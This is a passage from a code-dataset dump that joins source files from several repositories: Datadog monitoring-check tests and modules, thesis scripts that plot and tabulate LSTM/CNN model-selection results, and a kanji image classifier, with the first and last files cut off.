print('「確認」すべての解答を送信して終了するボタン押下時にエラーが発生しました。')
if error_flg is False:
access('レビューを終了する')
if error_flg is False:
print('体温報告を完了しました。')
# putting away : 片付け
driver.close()
``` |
{
"source": "01100010011001010110010101110000/integrations-core",
"score": 2
} |
#### File: aerospike/tests/test_unit.py
```python
import copy
import mock
import pytest
from datadog_checks import aerospike
from . import common
pytestmark = pytest.mark.unit
METRICS = [
'aerospike.datacenter.dc_timelag',
'aerospike.datacenter.dc_rec_ship_attempts',
'aerospike.datacenter.dc_delete_ship_attempts',
'aerospike.datacenter.dc_remote_ship_ok',
'aerospike.datacenter.dc_err_ship_client',
'aerospike.datacenter.dc_err_ship_server',
'aerospike.datacenter.dc_esmt_bytes_shipped',
'aerospike.datacenter.dc_esmt_ship_avg_comp_pct',
'aerospike.datacenter.dc_latency_avg_ship',
'aerospike.datacenter.dc_remote_ship_avg_sleep',
'aerospike.datacenter.dc_open_conn',
'aerospike.datacenter.dc_recs_inflight',
'aerospike.datacenter.dc_size',
]
def test_datacenter_metrics(aggregator):
check = aerospike.AerospikeCheck('aerospike', {}, [common.INSTANCE])
original_get_info = check.get_info
def mock_get_info(command, separator=";"):
if command == 'dcs':
return ['test']
elif command.startswith("dc/"):
return common.DATACENTER_METRICS
return original_get_info(command, separator)
check.get_info = mock_get_info
check._client = mock.MagicMock()
check.get_namespaces = mock.MagicMock()
check.collect_info = mock.MagicMock()
check.collect_throughput = mock.MagicMock()
check.collect_latency = mock.MagicMock()
check.collect_version = mock.MagicMock()
check.check(common.INSTANCE)
for metric in METRICS:
aggregator.assert_metric(metric)
def connection_uses_tls():
instance = copy.deepcopy(common.INSTANCE)
tls_config = {'cafile': 'my-ca-file', 'certfile': 'my-certfile', 'keyfile': 'my-keyfile'}
instance['tls_config'] = copy.deepcopy(tls_config)
check = aerospike.AerospikeCheck('aerospike', {}, [common.INSTANCE])
tls_config['enable'] = True
assert check._tls_config == tls_config
with mock.patch('aerospike.client') as client:
check.get_client()
assert client.called_with({'host': check._host, 'tls': tls_config})
```
#### File: airflow/tests/test_check_metrics_up_to_date.py
```python
import re
import requests
# Make sure this expected metrics list is up to date with:
# - `dogstatsd_mapper_profiles` configuration from README.md
# - metadata.csv
EXPECTED_METRICS = [
'<job_name>_start',
'<job_name>_end',
'operator_failures_<operator_name>',
'operator_successes_<operator_name>',
'ti_failures',
'ti_successes',
'zombies_killed',
'scheduler_heartbeat',
'dag_processing.processes',
'scheduler.tasks.killed_externally',
'dagbag_size',
'dag_processing.import_errors',
'dag_processing.total_parse_time',
'dag_processing.last_runtime.<dag_file>',
'dag_processing.last_run.seconds_ago.<dag_file>',
'dag_processing.processor_timeouts',
'executor.open_slots',
'executor.queued_tasks',
'executor.running_tasks',
'pool.open_slots.<pool_name>',
'pool.used_slots.<pool_name>',
'pool.starving_tasks.<pool_name>',
'dagrun.dependency-check.<dag_id>',
'dag.<dag_id>.<task_id>.duration',
'dag_processing.last_duration.<dag_file>',
'dagrun.duration.success.<dag_id>',
'dagrun.duration.failed.<dag_id>',
'dagrun.schedule_delay.<dag_id>',
]
METRIC_PATTERN = re.compile(r'^``([^`]+)``\s+(.*)', re.MULTILINE)
def test_check_metrics_up_to_date():
url = 'https://raw.githubusercontent.com/apache/airflow/master/docs/metrics.rst'
resp = requests.get(url)
content = resp.content.decode('utf-8')
matches = METRIC_PATTERN.findall(content)
# Printed only on failure for convenience.
print("Metric from {} :".format(url))
print("")
for metric, desc in matches:
print("{:50} {}".format(metric, desc))
metrics = [m for m, desc in matches]
assert EXPECTED_METRICS == metrics
```
#### File: datadog_checks/aspdotnet/aspdotnet.py
```python
try:
from datadog_checks.base import PDHBaseCheck
except ImportError:
class PDHBaseCheck:
pass
EVENT_TYPE = SOURCE_TYPE_NAME = 'aspdotnet'
DEFAULT_COUNTERS = [
# counterset, instance of counter, counter name, metric name
# This set is from the Microsoft recommended counters to monitor exchange:
# https://technet.microsoft.com/en-us/library/dn904093%28v=exchg.150%29.aspx?f=255&MSPPError=-2147217396
# ASP.Net
["ASP.NET", None, "Application Restarts", "aspdotnet.application_restarts", "gauge"],
["ASP.NET", None, "Worker Process Restarts", "aspdotnet.worker_process_restarts", "gauge"],
["ASP.NET", None, "Request Wait Time", "aspdotnet.request.wait_time", "gauge"],
# ASP.Net Applications
[
"ASP.NET Applications",
None,
"Requests In Application Queue",
"aspdotnet.applications.requests.in_queue",
"gauge",
],
["ASP.NET Applications", None, "Requests Executing", "aspdotnet.applications.requests.executing", "gauge"],
["ASP.NET Applications", None, "Requests/Sec", "aspdotnet.applications.requests.persec", "gauge"],
[
"ASP.NET Applications",
None,
"Forms Authentication Failure",
"aspdotnet.applications.forms_authentication.failure",
"gauge",
],
[
"ASP.NET Applications",
None,
"Forms Authentication Success",
"aspdotnet.applications.forms_authentication.successes",
"gauge",
],
]
class AspdotnetCheck(PDHBaseCheck):
def __init__(self, name, init_config, agentConfig, instances=None):
PDHBaseCheck.__init__(self, name, init_config, agentConfig, instances=instances, counter_list=DEFAULT_COUNTERS)
```
#### File: couch/tests/conftest.py
```python
import json
import os
from collections import defaultdict
from copy import deepcopy
from time import sleep
import pytest
import requests
from datadog_checks.couch import CouchDb
from datadog_checks.dev import WaitFor, docker_run
from datadog_checks.dev.conditions import CheckEndpoints
from . import common
@pytest.fixture
def check():
if common.COUCH_MAJOR_VERSION == 1:
return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG])
elif common.COUCH_MAJOR_VERSION == 2:
return CouchDb(common.CHECK_NAME, {}, instances=[common.BASIC_CONFIG_V2])
@pytest.fixture
def instance():
if common.COUCH_MAJOR_VERSION == 1:
return deepcopy(common.BASIC_CONFIG)
elif common.COUCH_MAJOR_VERSION == 2:
return deepcopy(common.BASIC_CONFIG_V2)
@pytest.fixture
def active_tasks():
"""
Returns a raw response from `/_active_tasks`
"""
with open(os.path.join(common.HERE, 'fixtures', '_active_tasks.json')) as f:
return json.loads(f.read())
@pytest.fixture(scope="session")
def dd_environment():
"""
Start a cluster with one master, one replica and one unhealthy replica and
stop it after the tests are done.
If there's any problem executing docker-compose, let the exception bubble
up.
"""
couch_version = os.environ["COUCH_VERSION"][0]
with docker_run(
compose_file=os.path.join(common.HERE, 'compose', 'compose_v{}.yaml'.format(couch_version)),
env_vars={'COUCH_PORT': common.PORT},
conditions=[
CheckEndpoints([common.URL]),
lambda: generate_data(couch_version),
WaitFor(send_replication, args=(couch_version,)),
WaitFor(get_replication, args=(couch_version,)),
],
):
if couch_version == '1':
yield common.BASIC_CONFIG
elif couch_version == '2':
yield common.BASIC_CONFIG_V2
def send_replication(couch_version):
"""
Send replication task to trigger tasks
"""
if couch_version == '1':
return
replicator_url = "{}/_replicator".format(common.NODE1['server'])
replication_body = {
'_id': 'my_replication_id',
'source': 'http://dduser:[email protected]:5984/kennel',
'target': 'http://dduser:[email protected]:5984/kennel_replica',
'create_target': True,
'continuous': True,
}
r = requests.post(
replicator_url,
auth=(common.NODE1['user'], common.NODE1['password']),
headers={'Content-Type': 'application/json'},
json=replication_body,
)
r.raise_for_status()
def get_replication(couch_version):
"""
Attempt to get active replication tasks
"""
if couch_version == '1':
return
task_url = "{}/_active_tasks".format(common.NODE1['server'])
r = requests.get(task_url, auth=(common.NODE1['user'], common.NODE1['password']))
r.raise_for_status()
count = len(r.json())
return count > 0
def generate_data(couch_version):
"""
Generate data on the couch cluster to test metrics.
"""
# pass in authentication info for version 2
auth = (common.USER, common.PASSWORD) if couch_version == "2" else None
headers = {'Accept': 'text/json'}
# Generate a test database
requests.put("{}/kennel".format(common.URL), auth=auth, headers=headers)
# Populate the database
data = {
"language": "javascript",
"views": {
"all": {"map": "function(doc) { emit(doc._id); }"},
"by_data": {"map": "function(doc) { emit(doc.data, doc); }"},
},
}
requests.put("{}/kennel/_design/dummy".format(common.URL), json=data, auth=auth, headers=headers)
urls = [
"{}/_node/[email protected]/_stats".format(common.URL),
"{}/_node/[email protected]/_stats".format(common.URL),
"{}/_node/[email protected]/_stats".format(common.URL),
]
ready = defaultdict(bool)
for _ in range(120):
print("Waiting for stats to be generated on the nodes...")
try:
for url in urls:
if not ready[url]:
res = requests.get(url, auth=auth, headers=headers)
if res.json():
ready[url] = True
if len(ready) and all(ready.values()):
break
except Exception:
pass
sleep(1)
if couch_version == "1":
return
doc_url = "{}/_replicator/_all_docs".format(common.URL)
for _ in range(120):
try:
res = requests.get(doc_url, auth=auth, headers=headers)
data = res.json()
if data.get('rows'):
break
except Exception:
pass
sleep(1)
```
#### File: tests/tooling/test_utils.py
```python
import os
import mock
from datadog_checks.dev.tooling.config import copy_default_config
from datadog_checks.dev.tooling.utils import (
complete_set_root,
get_version_string,
initialize_root,
parse_agent_req_file,
)
from ..common import not_windows_ci
def test_parse_agent_req_file():
contents = "datadog-active-directory==1.1.1; sys_platform == 'win32'\nthis is garbage"
catalog = parse_agent_req_file(contents)
assert len(catalog) == 1
assert catalog['datadog-active-directory'] == '1.1.1'
def test_get_version_string():
with mock.patch('datadog_checks.dev.tooling.utils.read_version_file') as read:
read.return_value = '__version__ = "2.0.0"'
assert get_version_string('foo_check') == '2.0.0'
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_bad_path(set_root, get_root):
get_root.return_value = ''
# bad path in config results in cwd
config = copy_default_config()
config['core'] = '/path/does/not/exist'
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.getcwd())
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_good_path(set_root, get_root):
get_root.return_value = ''
# good path in config uses that
config = copy_default_config()
config['core'] = '~'
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.path.expanduser('~'))
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_initialize_root_env_var(set_root, get_root):
get_root.return_value = ''
ddev_env = '/tmp'
with mock.patch.dict(os.environ, {'DDEV_ROOT': ddev_env}):
config = copy_default_config()
initialize_root(config)
assert set_root.called
set_root.assert_called_with(os.path.expanduser(ddev_env))
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_no_args(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
config['core'] = '/tmp' # ensure we choose a dir that exists
load_config.return_value = config
args = []
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(config['core'])
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_here(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
load_config.return_value = config
args = ['-x']
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(os.getcwd())
@not_windows_ci
@mock.patch('datadog_checks.dev.tooling.utils.get_root')
@mock.patch('datadog_checks.dev.tooling.utils.set_root')
def test_complete_set_root_extras(set_root, get_root):
get_root.return_value = ''
with mock.patch('datadog_checks.dev.tooling.utils.load_config') as load_config:
config = copy_default_config()
config['extras'] = '/tmp' # ensure we choose a dir that exists
load_config.return_value = config
args = ['-e']
complete_set_root(args)
assert set_root.called
set_root.assert_called_with(config['extras'])
```
#### File: ibm_mq/tests/test_ibm_mq_e2e.py
```python
import pytest
from .common import assert_all_metrics
@pytest.mark.e2e
def test_e2e_check_all(dd_agent_check, instance_collect_all):
aggregator = dd_agent_check(instance_collect_all, rate=True)
assert_all_metrics(aggregator)
```
#### File: datadog_checks/snmp/models.py
```python
from typing import Any, Sequence, Tuple, Union
from .exceptions import CouldNotDecodeOID
from .pysnmp_types import ObjectIdentity, ObjectName, ObjectType
from .utils import format_as_oid_string, parse_as_oid_tuple
class OID(object):
"""
An SNMP object identifier.
Acts as a facade for various types used by PySNMP to represent OIDs.
"""
def __init__(self, value):
# type: (Union[Sequence[int], str, ObjectName, ObjectIdentity, ObjectType]) -> None
try:
parts = parse_as_oid_tuple(value)
except CouldNotDecodeOID:
raise # Explicitly re-raise this exception.
# Let's make extra sure we didn't mess up.
if not isinstance(parts, tuple):
raise RuntimeError(
'Expected result {!r} of parsing value {!r} to be a tuple, but got {}'.format(parts, value, type(parts))
) # pragma: no cover
self._parts = parts
def as_tuple(self):
# type: () -> Tuple[int, ...]
return self._parts
def __eq__(self, other):
# type: (Any) -> bool
return isinstance(other, OID) and self.as_tuple() == other.as_tuple()
def __str__(self):
# type: () -> str
return format_as_oid_string(self.as_tuple())
def __repr__(self):
# type: () -> str
return 'OID({!r})'.format(str(self))
```
#### File: datadog_checks/system_swap/system_swap.py
```python
import psutil
# project
from datadog_checks.checks import AgentCheck
class SystemSwap(AgentCheck):
def check(self, instance):
swap_mem = psutil.swap_memory()
tags = instance.get('tags', [])
self.rate('system.swap.swapped_in', swap_mem.sin, tags=tags)
self.rate('system.swap.swapped_out', swap_mem.sout, tags=tags)
```
#### File: tests/legacy/conftest.py
```python
import mock
import pytest
from datadog_checks.vsphere.legacy.vsphere_legacy import VSphereLegacyCheck
from .utils import disable_thread_pool, get_mocked_server
def _instance():
"""
Create a default instance, used by multiple fixtures
"""
return {'name': 'vsphere_mock', 'tags': ['foo:bar']}
@pytest.fixture
def instance():
"""
Return a default instance
"""
return _instance()
@pytest.fixture
def vsphere():
"""
Provide a check instance with mocked parts
"""
# mock the server
server_mock = get_mocked_server()
# create a check instance
check = VSphereLegacyCheck('vsphere', {}, [_instance()])
# patch the check instance
check._get_server_instance = mock.MagicMock(return_value=server_mock)
# return the check after disabling the thread pool
return disable_thread_pool(check)
@pytest.fixture
def aggregator():
from datadog_checks.stubs import aggregator
aggregator.reset()
return aggregator
```
#### File: zk/tests/common.py
```python
import os
from datadog_checks.zk import ZookeeperCheck
ZK_VERSION = os.environ['ZK_VERSION']
MNTR_METRICS = [
'zookeeper.packets_sent',
'zookeeper.approximate_data_size',
'zookeeper.num_alive_connections',
'zookeeper.open_file_descriptor_count',
'zookeeper.avg_latency',
'zookeeper.znode_count',
'zookeeper.outstanding_requests',
'zookeeper.min_latency',
'zookeeper.ephemerals_count',
'zookeeper.watch_count',
'zookeeper.max_file_descriptor_count',
'zookeeper.packets_received',
'zookeeper.max_latency',
]
METRICS_34 = [
'zookeeper.packets.sent',
'zookeeper.latency.avg',
'zookeeper.latency.min',
'zookeeper.connections',
'zookeeper.zxid.epoch',
'zookeeper.bytes_sent',
'zookeeper.bytes_received',
'zookeeper.instances',
'zookeeper.nodes',
'zookeeper.zxid.count',
'zookeeper.packets.received',
'zookeeper.latency.max',
]
def assert_service_checks_ok(aggregator):
aggregator.assert_service_check("zookeeper.ruok", status=ZookeeperCheck.OK)
aggregator.assert_service_check("zookeeper.mode", status=ZookeeperCheck.OK)
``` |
{
"source": "011000101101/Bachelor_Arbeit",
"score": 3
} |
#### File: NeuronalNetworks/combined_project/create_lstm_model_structure_graphs_with_tensorboard.py
```python
from train_model_lstm import *
def train_model_tmp(model: tf.keras.Model, list_of_batches: list,
current_basepath: str):
tensorboard_cb = tf.keras.callbacks.TensorBoard(current_basepath, histogram_freq=1)
x_train = np.asarray([data.coordinate_pairs for data in list_of_batches[0]])
x_train = x_train.reshape(batch_size, len(list_of_batches[0][0].coordinate_pairs), 2)
y_train = np.asarray([data.true_cost for data in list_of_batches[0]])
model.fit(x_train, y_train, epochs=1, callbacks=[tensorboard_cb])
def train_one_model_variant_tmp(lstm_layer_count, dense_layer_count, list_of_batches,
data_validate):
print("\n\n\ntraining model '{}_lstm_layers_{}_dense_layers_{}'\n\n\n".format(
lstm_layer_count, dense_layer_count, "inflating"
))
current_model = define_model(lstm_layer_count, dense_layer_count, "inflating", False)
current_basepath = os.path.abspath(
"./models/tmp/{}_lstm_layers_{}_dense_layers".format(
lstm_layer_count, dense_layer_count
)
)
train_model_tmp(current_model, list_of_batches, current_basepath)
lstm_layer_counts = [3, 2, 1]
dense_layer_counts = [2, 1]
if __name__ == "__main__":
# load train data characteristics
batches, data_val = load_data()
# HPO loop (grid search over few points because of long runtime)
for current_lstm_layer_count in lstm_layer_counts:
for current_dense_layer_count in dense_layer_counts:
train_one_model_variant_tmp(current_lstm_layer_count, current_dense_layer_count,
batches, data_val)
```
#### File: combined_project/model_selection/plot_model_selection.py
```python
import matplotlib.pyplot as plt
from matplotlib import cm
from mpl_toolkits import mplot3d
import plotly.graph_objects as go
import os
import pickle
import pandas as pd
from model_selection.util import *
with open("runtime_quality_map.pkl", "rb") as f:
runtime_quality_map = pickle.load(f)
def get_score(model: str, fixed_value: tuple) -> int:
circuit, score = fixed_value
quality = runtime_quality_map[(model, circuit)]
if score == "channel_width":
return np.asarray(quality[2][0]).mean()
else: # critical path length
return np.asarray(quality[2][1]).mean()
def plot_model_scores_over_circuit(type: str):
models = os.listdir(rnn_model_base_path if type == "rnn" else cnn_model_base_path)
labels = [eval_circuits[0],
'combined',
eval_circuits[1]]
def plot_model_scores_over_hyperparams(circuit, metric, reference):
"""
over layer defs (X) and inflation type (+ filter size) (Y)
:param type:
:return:
"""
# models_cnn = os.listdir(cnn_model_base_path)
# models_rnn = os.listdir(rnn_model_base_path)
#
# # layer defs
# special_layer_counts = [model_name.split("_")[0] for model_name in models]
# dense_layer_counts = [model_name.split("_")[3] for model_name in models]
# inflation types
y_labels_cnn = ["0 conv2d layers",
"1 conv2d layer",
"2 conv2d layers"]
x_labels_cnn = ["inflating, 3",
"deflating, 3",
"inflating, 7",
"deflating, 7"]
def f_cnn(x_in, y_in, fixed_value):
tmp = get_score(
"{}_conv_layers_{}_kernel_size_{}".format(
int(y_in),
("inflating" if x_in % 2 == 0 else "deflating"),
(-1 if y_in == 0 else (3 if (x_in // 2) % 2 == 0 else 7))
),
fixed_value
)
return tmp if tmp > 0 else 0.1
plot_scores_of_one_model_in_3d(
"mean achieved {}\nCNN models on circuit '{}'".format(metric, circuit), x_labels_cnn, y_labels_cnn, 'layer dimensions, conv2d kernel size', 'layers',
metric,
f_cnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None
)
y_labels_rnn = ["(1, 1)",
"(1, 2)",
"(2, 1)",
"(2, 2)",
"(3, 1)",
"(3, 2)"]
x_labels_rnn = ["inflating",
"deflating",
"bloating"]
def f_rnn(x_in, y_in, fixed_value):
tmp = get_score(
"{}_lstm_layers_{}_dense_layers_{}".format(
int(y_in) // 2 + 1,
int(y_in) % 2 + 1,
("inflating" if x_in == 0 else "deflating" if x_in == 1 else "bloating")
),
fixed_value
)
return tmp if tmp > 0 else 0.1
plot_scores_of_one_model_in_3d(
"mean achieved {}\nRNN models on circuit '{}'".format(metric, circuit), x_labels_rnn, y_labels_rnn, 'layer dimensions', 'lstm layers, dense layers',
metric,
f_rnn, (circuit, metric), get_score("reference", (circuit, metric)) if reference else None
)
print("reference value for {}: {}".format(metric, get_score("reference", (circuit, metric))))
def plot_scores_of_one_model_in_3d(title,
x_labels: list, y_labels: list, x_axis_label: str, y_axis_label: str, z_axis_label: str,
mapping_func, fixed_value, reference_value):
# def symlog_shift(arr, shift=0):
# # shift array-like to symlog array with shift
# logv = np.abs(arr) * (10. ** shift)
# logv[np.where(logv < 1.)] = 1.
# logv = np.sign(arr) * np.log10(logv)
# return logv
#
# def symlog_shift_ticks(tks1, tks2, tks3, shift=0):
# # generate the tick position and the corresponding tick labels in symlog scale with shift
# # tks1, tks2, tks3: tick values in log scale
#
# # tick positions to show in graph
# tkps = [-v - shift for v in tks1] + tks2 + [v + shift for v in tks3]
# # tkck labels in str
# tkls = ['$-10^{%d}$' % (v) for v in tks1] + [''] + ['$10^{%d}$' % (v) for v in tks3]
# return tkps, tkls
def color(val):
return cm.coolwarm(val)
SHIFT = 1
x = np.linspace(0, len(x_labels)-1, len(x_labels)) # number of augmentation methods
y = np.linspace(0, len(y_labels)-1, len(y_labels))
X, Y = np.meshgrid(x, y)
x_flat = X.flatten()
y_flat = Y.flatten()
Z = [mapping_func(x_flat[i], y_flat[i], fixed_value) for i in range(len(x_labels)*len(y_labels))]
Z = np.reshape(Z, (len(y_labels), len(x_labels)))
# Z = symlog_shift(Z,shift=SHIFT)
# ztkps, ztkls = symlog_shift_ticks([2, 1, 0, -1], [0], [-1, 0, 1, 2], shift=SHIFT)
Z_colors = np.array([[color(z) for z in row] for row in Z]).reshape(Z.shape + (-1,))
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.set_xticks(range(len(x_labels)))
ax.set_xticklabels(x_labels, horizontalalignment='right')
ax.set_yticks(range(len(y_labels)))
ax.set_yticklabels(y_labels, horizontalalignment='left')
# ax.set_zticks(ztkps)
# ax.set_zticklabels(ztkls)
if reference_value is not None:
Z_const = [reference_value for i in range(len(x_labels) * len(y_labels))]
Z_const = np.reshape(Z_const, (len(y_labels), len(x_labels)))
ax.plot_surface(X, Y, Z_const, label='reference score', rstride=1, cstride=1,
cmap='viridis', edgecolor='none')
ax.plot_surface(X, Y, Z, rstride=1, label='achieved score', cstride=1,
cmap='viridis', edgecolor='none')
# ax.set_title('evaluation on model \"{}\"'.format(model.__str__()))
ax.set_title(title)
ax.set_xlabel(x_axis_label, labelpad=16)
ax.set_ylabel(y_axis_label, labelpad=2)
ax.set_zlabel(z_axis_label)
# ax.set_zlim((0, 5))
# ax.set_zbound((0, 5))
ax.tick_params(labelsize=6)
ax.tick_params(axis='x', pad=-4)
ax.tick_params(axis='y', rotation=350, pad=-4)
ax.view_init(30, 330)
plt.show()
def print_result_table(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "lstm" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
dict_lstm = dict(
zip(
tuples,
[
{
"channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2),
"critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2)
}
for key
in keys
]
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure'])
df = pd.DataFrame(dict_lstm, columns=index).transpose()
df.to_latex("model_selection_lstm_performance_table_{}_latex.txt".format(circuit))
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "conv" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
dict_cnn = dict(
zip(
tuples,
[
{
"channel_width": round(float(np.median(np.asarray(runtime_quality_map[key][2][0]))), 2),
"critical_path_ns": round(float(np.median(np.asarray(runtime_quality_map[key][2][1]))), 2)
}
for key
in keys
]
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size'])
df = pd.DataFrame(dict_cnn, columns=index).transpose()
df.to_latex("model_selection_cnn_performance_table_{}_latex.txt".format(circuit))
def print_result_table_full(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "lstm" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
row_tuples = [("channel_width", "1"),
("channel_width", "2"),
("channel_width", "3"),
("channel_width", "mean"),
("critical_path", "1"),
("critical_path", "2"),
("critical_path", "3"),
("critical_path", "mean")]
values = [
{
("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2),
("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2),
("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2),
("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2),
("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2),
("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2),
("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2),
("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2)
}
for key
in keys
]
dict_eval = dict(
zip(
tuples,
values
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['lstm_layer_count', 'dense_layer_count', 'structure'])
index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt'])
df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose()
print(df)
df.to_latex("model_selection_lstm_performance_table_{}_latex_full.txt".format(circuit))
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
keys = [entry for entry in keys if "conv" in entry[0]]
tuples = [(entry[0].split("_")[0], entry[0].split("_")[3], entry[0].split("_")[6]) for entry in keys]
row_tuples = [("channel_width", "1"),
("channel_width", "2"),
("channel_width", "3"),
("channel_width", "mean"),
("critical_path", "1"),
("critical_path", "2"),
("critical_path", "3"),
("critical_path", "mean")]
values = [
{
("channel_width", "1"): round(runtime_quality_map[key][2][0][0], 2),
("channel_width", "2"): round(runtime_quality_map[key][2][0][1], 2),
("channel_width", "3"): round(runtime_quality_map[key][2][0][2], 2),
("channel_width", "mean"): round(float(np.asarray(runtime_quality_map[key][2][0]).mean()), 2),
("critical_path", "1"): round(runtime_quality_map[key][2][1][0], 2),
("critical_path", "2"): round(runtime_quality_map[key][2][1][1], 2),
("critical_path", "3"): round(runtime_quality_map[key][2][1][2], 2),
("critical_path", "mean"): round(float(np.asarray(runtime_quality_map[key][2][1]).mean()), 2)
}
for key
in keys
]
dict_eval = dict(
zip(
tuples,
values
)
)
index=pd.MultiIndex.from_tuples(tuples, names=['conv_layer_count', 'structure', 'kernel_size'])
index_rows=pd.MultiIndex.from_tuples(row_tuples, names=['metric', 'attempt'])
df = pd.DataFrame(dict_eval, columns=index, index=index_rows).transpose()
print(df)
df.to_latex("model_selection_cnn_performance_table_{}_latex_full.txt".format(circuit))
def print_best_model(circuit):
keys = list(runtime_quality_map.keys())
keys = [entry for entry in keys if isinstance(entry, tuple)]
keys = [entry for entry in keys if entry[1] == circuit]
results = [(key, runtime_quality_map[key][2][0]) for key in keys]
results = [(key, np.median(np.asarray(value))) for key, value in results]
results_rnn = [(key, value) for key, value in results if "lstm" in key[0]]
values_rnn = [value for key, value in results_rnn]
result_rnn = [key for key, value in results_rnn if value == min(values_rnn)]
print(result_rnn)
print("best rnn: {} with channel_width {}".format(
result_rnn[0] if len(result_rnn) == 1 else result_rnn[1], min(values_rnn)) # does not change optimality of choice, but produces the chosen best_rnn on present data...
)
results_cnn = [(key, value) for key, value in results if "conv" in key[0]]
values_cnn = [value for key, value in results_cnn]
result_cnn = [key for key, value in results_cnn if value == min(values_cnn)]
print(result_cnn)
print("best cnn: {} with channel_width {}".format(
result_cnn[0] if len(result_cnn) == 1 else result_cnn[1], min(values_cnn))
)
if __name__ == "__main__":
plot_model_scores_over_hyperparams(eval_circuits[0], "channel_width", reference=True)
plot_model_scores_over_hyperparams(eval_circuits[0], "critical path length (ns)", reference=True)
print_result_table(eval_circuits[0])
print_result_table_full(eval_circuits[0])
print_best_model(eval_circuits[0])
``` |
{
"source": "011000101101/VRAR_project",
"score": 3
} |
#### File: VRAR_project/classifier_subsystem/model.py
```python
import numpy as np
import os
import cv2
import pickle
from sklearn import neighbors
import os
from utils.params import *
from utils.image_augmenting import add_noise_greyscale
def train(model, X, y, name: str):
"""
train a model on the given training set and optionally save it to disk
:param model: the model to train
:param X: the sample images, list of numpy arrays (greyscale images)
:param y: the target labels, list of strings (kanji)
:param name: name of the model used to save it on disk, or None if it is not to be saved
:return: the trained model
"""
# reshape X to 2d
X = np.asarray(X)
X = X.reshape((X.shape[0], -1))
print("fitting on {} samples".format(len(y)))
# train the model
print("begin fitting")
model.fit(X, y)
print("done fitting")
# optionally save trained model
if name is not None:
with open("trained_{}.pkl".format(name), 'wb') as f:
pickle.dump(model, f, pickle.HIGHEST_PROTOCOL)
return model
def evaluate(model_or_name, X, y, interactive: bool = False):
"""
evaluate a model on the given evaluation set
:param model_or_name: either the model itself, or the name of a pretrained and saved model as string
:param X: the sample images, list of numpy arrays (greyscale images)
:param y: the target labels, list of strings (kanji)
:param interactive: flag to visually explore the evaluation set and the predictions made
:return: performance score as number of samples given and number of correct predictions made
"""
# get model
if isinstance(model_or_name, str): # name of model passed...
# load from disk
with open("trained_{}.pkl".format(model_or_name), 'rb') as f:
model = pickle.load(f)
else: # model passed directly...
model = model_or_name # use
correct = 0
print("evaluating on {} samples...".format(len(X)))
# for each sample image in evaluation set
for index in range(len(X)):
# predict the kanji it depicts
Z = model.predict(X[index].reshape((1, -1)))
# count correct predictions
if Z[0] == y[index]:
correct += 1
# interactively explore sample images and predictions
if interactive:
cv2.imshow("asdf", X[index]);cv2.waitKey();cv2.destroyAllWindows()
print(Z)
print(y[index])
print("correct" if Z[0] == y[index] else "wrong")
print("\n")
print("finished evaluating.")
# return total number of predictions made and number of correct predictions
return len(X), correct
def predict(model, X: np.ndarray) -> str:
"""
predicts the kanji for a single image
:param model: the classifier model
:param X: the sample image, 2d numpy array (greyscale)
:return: the redicted label/kanji
"""
return model.predict(X.reshape((1, -1)))
```
#### File: VRAR_project/precompute/convert_kanjidic2_to_hashtable.py
```python
import xml.etree.ElementTree as ET
import pickle
import os
from utils.params import *
import utils.stringutils as stringutils
def hiraganify_single_on_yomi(on_yomi: str):
utf8_bytes = list(on_yomi.encode("utf-8"))
kun_yomi = ""
for char in on_yomi:
